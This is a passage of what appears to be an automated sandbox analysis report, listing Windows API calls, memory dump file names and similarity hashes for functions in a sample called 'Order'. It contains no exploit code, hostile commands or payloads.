                      • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066FF
                      • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406705
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CharLower
                      • String ID:
                      • API String ID: 1615517891-0
                      • Opcode ID: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                      • Instruction ID: 50cff0fc212774e4e1f85142edc8b720228546f3e888a8e5f893537154114361
                      • Opcode Fuzzy Hash: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                      • Instruction Fuzzy Hash: 582176796043058BC710AF1D9C40077B7E4EB80364F86483BEC85A3380D639EE169BA9
                      APIs
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412271
                      • malloc.MSVCRT ref: 00412281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041229B
                      • malloc.MSVCRT ref: 004122B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: ByteCharMultiWidemalloc
                      • String ID:
                      • API String ID: 2735977093-0
                      • Opcode ID: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                      • Instruction ID: 3c1085fe75aa08d7dfcf325d5fd6ce3d1ff6e0efa089dc1519f7c1eb2db8e9d3
                      • Opcode Fuzzy Hash: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                      • Instruction Fuzzy Hash: F70145373413013BE2204685AC02FAB3B58CBC1B95F1900BAFF04AE6C0C6F3A80182B8
                      APIs
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D0B8,00000000), ref: 004121D4
                      • malloc.MSVCRT ref: 004121E4
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00412201
                      • malloc.MSVCRT ref: 00412216
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: ByteCharMultiWidemalloc
                      • String ID:
                      • API String ID: 2735977093-0
                      • Opcode ID: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                      • Instruction ID: ba92e613a2f9bf0a88025da3432e472bc54701246ba04d0c993b0b67be8a7a27
                      • Opcode Fuzzy Hash: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                      • Instruction Fuzzy Hash: 9401F57B38130137E3205695AC42FBB7B59CB81B95F1900BAFB05AE2C1D6F76814C6B9
                      APIs
                      • SHGetFolderLocation.SHELL32(00000000,02319778,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A91B,00000000,00000000,00000104,?), ref: 0040A97E
                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A98F
                      • wcslen.MSVCRT ref: 0040A99A
                      • CoTaskMemFree.OLE32(00000000,?,00000104,0040A91B,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A9B8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: FolderFreeFromListLocationPathTaskwcslen
                      • String ID:
                      • API String ID: 4012708801-0
                      • Opcode ID: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                      • Instruction ID: 15676ea375ba95ce47a4ad1d62f3a4f85f84cc5ccd71b7d74cdbb22097095955
                      • Opcode Fuzzy Hash: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                      • Instruction Fuzzy Hash: 51F0D136610614BAC7205B6ADD08DAB7B78EF06660B414126F805E6250E7308920C7E5
                      APIs
                        • Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
                        • Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428
                      • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                      • EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                      • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472
                        • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                      • LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                      • String ID:
                      • API String ID: 85618057-0
                      • Opcode ID: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                      • Instruction ID: 3069acd899a723a1849542c16efb52ddeba99d38bb4cb8d15d413c759c742d3e
                      • Opcode Fuzzy Hash: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                      • Instruction Fuzzy Hash: CDF05432905610AFC2205F619C48AE77B79EF54767715843FF94573190D73868408E6E
                      APIs
                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                        • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02310000,00000000,?), ref: 0040DEF9
                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02310000,00000000,?,?), ref: 0040DF1C
                        • Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5
                        • Part of subcall function 00402E9D: __fprintf_l.LIBCMT ref: 00402F1F
                        • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                        • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                        • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                        • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                        • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                        • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                        • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                        • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                        • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                        • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                        • Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07
                      • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC
                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                      • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,02319E98,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231
                        • Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                      • String ID: $pA
                      • API String ID: 790731606-4007739358
                      • Opcode ID: f33b77279b43f6c2a7ef6627287f9fc20ba1f8a50c04e803199af3b471e760de
                      • Instruction ID: fee6f31afef46dfc3d4b18dc130868db542cea1a9d30875f0fa626089c73850b
                      • Opcode Fuzzy Hash: f33b77279b43f6c2a7ef6627287f9fc20ba1f8a50c04e803199af3b471e760de
                      • Instruction Fuzzy Hash: E151F6B5904A007EE2007BF2DD82E3F266EDFD4719B10893FF844B9092C93C994DA66D
                      APIs
                      • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
                      • PathRemoveArgsW.SHLWAPI(?), ref: 004025D9
                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02310000,00000000,?), ref: 0040DEF9
                        • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(02319778,02319778,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                        • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                        • Part of subcall function 0040DF50: HeapFree.KERNEL32(02310000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                      • String ID: *pA
                      • API String ID: 1199808876-3833533140
                      • Opcode ID: 11b1f39d3e9737ca0d6b51d618b1608c274ee9a255191aaff6a0b6077b3e1a9a
                      • Instruction ID: 21a80edfc212e2aa9d277187ee9bfa0e7f9d15baa35618845dd156f20ee28a4c
                      • Opcode Fuzzy Hash: 11b1f39d3e9737ca0d6b51d618b1608c274ee9a255191aaff6a0b6077b3e1a9a
                      • Instruction Fuzzy Hash: 6C412DB5904701AED600BBB2DD8293F77ADEBD4309F108D3FF544A9092CA3CD849966E
                      APIs
                        • Part of subcall function 0040D2E8: TlsGetValue.KERNEL32(?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D2EF
                        • Part of subcall function 0040D2E8: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D30A
                        • Part of subcall function 0040D2E8: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D319
                      • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Value$AllocCommandHeapLine
                      • String ID: $"
                      • API String ID: 1339485270-3817095088
                      • Opcode ID: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                      • Instruction ID: ab659b79707db7d7869a667e669445cd4c695224699636d93eb587c6e0e94742
                      • Opcode Fuzzy Hash: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                      • Instruction Fuzzy Hash: 4A31A7735252218ADB74AF10981127772A1EFA2B60F18C17FE4926B3D2F37D8D41D369
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: _wcsicmpwcscmp
                      • String ID: $0A
                      • API String ID: 3419221977-513306843
                      • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                      • Instruction ID: ce5e94a217663c04e8d70dd0a479d34a80eb67d33ce446282a7f9ad79867738e
                      • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                      • Instruction Fuzzy Hash: 2E11C476108B0A8FD3209F46D440923B3E9EF94364720843FD849A3791DB75FC218B6A
                      APIs
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide
                      • String ID: $0A
                      • API String ID: 626452242-513306843
                      • Opcode ID: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                      • Instruction ID: 257aa3cf1744ec2ccb71e28fb2e26357a5123011e6015fa77bf79efc500ed16d
                      • Opcode Fuzzy Hash: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                      • Instruction Fuzzy Hash: 16F0393A3862213BE230215A6C0AF672A69CB86F71F2542327B24BF2D085B5680046AC
                      APIs
                      • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?), ref: 0040D593
                      • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?), ref: 0040D648
                      • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000), ref: 0040D66B
                      • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?), ref: 0040D6C3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AllocCriticalHeapSection$EnterLeave
                      • String ID:
                      • API String ID: 830345296-0
                      • Opcode ID: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                      • Instruction ID: 88038414d57a756cd7fad5c0050c74a6e8d04d69e7cdc083c9acd98434601a7e
                      • Opcode Fuzzy Hash: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                      • Instruction Fuzzy Hash: 9C51E370A00B069FC324CF69D980926B7F5FF587103148A3EE89A97B90D335F959CB94
                      APIs
                      • wcslen.MSVCRT ref: 0040E145
                      • HeapAlloc.KERNEL32(02310000,00000000,0000000A), ref: 0040E169
                      • HeapReAlloc.KERNEL32(02310000,00000000,00000000,0000000A), ref: 0040E18D
                      • HeapFree.KERNEL32(02310000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E1C4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Heap$Alloc$Freewcslen
                      • String ID:
                      • API String ID: 2479713791-0
                      • Opcode ID: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                      • Instruction ID: 6002b1c3f5819bc59b30070f24097f674b8c445c60846b79d2129d941eb5fd7b
                      • Opcode Fuzzy Hash: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                      • Instruction Fuzzy Hash: BA21F774604209EFDB14CF94D884FAAB7BAEB48354F108569F9099F390D735EA81CF94
                      APIs
                      • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                      • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D4E3
                      • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                        • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AllocCriticalHeapSection$EnterLeave
                      • String ID:
                      • API String ID: 830345296-0
                      • Opcode ID: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                      • Instruction ID: 44ceb6562d1eb3065d03cece85d0244f92a2e0345c3169311120ea74ede9abb0
                      • Opcode Fuzzy Hash: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                      • Instruction Fuzzy Hash: 0A113D72604600AFC3208FA8DC40E56B7F9FB48325B14892EE896E36A1C734F804CF65
                      APIs
                      • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D6EF
                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D706
                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D722
                      • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D73F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
